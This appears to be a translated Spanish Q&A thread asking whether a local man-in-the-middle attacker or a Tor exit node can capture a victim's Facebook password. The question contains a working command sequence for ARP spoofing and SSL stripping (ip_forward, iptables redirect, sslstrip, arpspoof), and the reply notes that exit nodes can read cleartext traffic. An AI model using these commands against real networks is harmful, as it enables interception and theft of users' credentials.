¿Cómo puede un atacante rastrear una contraseña con el proxy SOCKS5?

2

¿Tengo que temer a un atacante local de "hombre en medio" al ingresar la contraseña con tor?

Supongamos que una víctima se está conectando a Facebook con tor Browser.

¿Cómo construiría un atacante un ataque de hombre en el medio que obtenga su contraseña? (qué comandos precisos)

Si no se usa un proxy, el atacante usaría

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p  tcp --destination-port 80 -j REDIRECT --to-port 54321
sslstrip -l 54321
arpspoof -i eth0  -t < targetIP > < gatewayIP > 
arpspoof -i eth0  -t < gatewayIP > < targetIP>
    
pregunta user123456 07.12.2016 - 02:07
fuente

1 respuesta

1

Hice una publicación de blog sobre esto aquí en 2012: enlace

El hecho es que un atacante puede lanzar ataques como usted menciona. El nodo de salida siempre podrá leer el tráfico de texto sin cifrar e incluso realizar ataques tipo tira SSL.

    
respondido por el Lucas Kauffman 07.12.2016 - 03:18
fuente

Lea otras preguntas en las etiquetas